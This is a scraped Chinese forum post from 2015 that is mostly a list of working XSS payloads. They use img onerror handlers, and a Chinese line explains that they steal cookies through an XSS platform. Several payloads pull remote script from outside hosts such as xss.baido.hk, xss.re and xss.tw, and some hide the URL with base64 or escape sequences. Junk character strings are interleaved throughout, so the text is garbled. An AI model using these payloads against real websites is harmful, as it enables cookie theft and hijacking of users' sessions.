<img src='non-exist.jpg'onerror="alert('xss')">
3 h0 u5 f% I1 m& ]: c$ X1 o; ?<img src=# onerror=alert(123)>
9 Q/ v& ^8 J6 J) K v. B<img src=# onerror=alert(document.cookie)>! o, Y4 t7 m+ V1 ]) {& a( w
下面是利用平台钓cookie的
u9 |1 P6 A$ g( t) p" ? <img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>+ v& a) S* T9 L' \) n3 ?: V/ X
. O: z, a7 C6 I. B
5 F, B' g7 L% [; z$ H5 Q% D* M<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>7 j5 m* t h1 q- j' ?; j
<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>
5 k7 M5 a& G$ ~1 \% ^- p“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>
1 u( ]% S4 U3 s& G% E4 h6 I) u<img src=1 onerror=jQuery.getScript("//xss.re/974")> 8 T6 X9 p$ {. a, T& V/ X, N
<img src="#">
7 r* V6 B0 X) W<img src="#">3 K8 _2 k: f1 i* o
<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>" T9 T' m" p! N6 C {& b {: D d
<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">8 r$ C/ f7 f# j8 M
<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>5 h9 h* ^/ N' E/ W# Q, R
<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>
$ H) b4 u. ~5 R4 V3 b: A+ u<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>& k! j( L C) v# r
<img src=x width="0" height="0"></img>1 V( L: i, T0 E! ]9 h$ V7 X
<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))> O0 K; d% G& h3 N1 p$ q! j2 Z8 J
<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>
% `2 T E: K; N9 ~3 D% t |
发表于 2015-10-18 14:33:54
收藏
支持
反对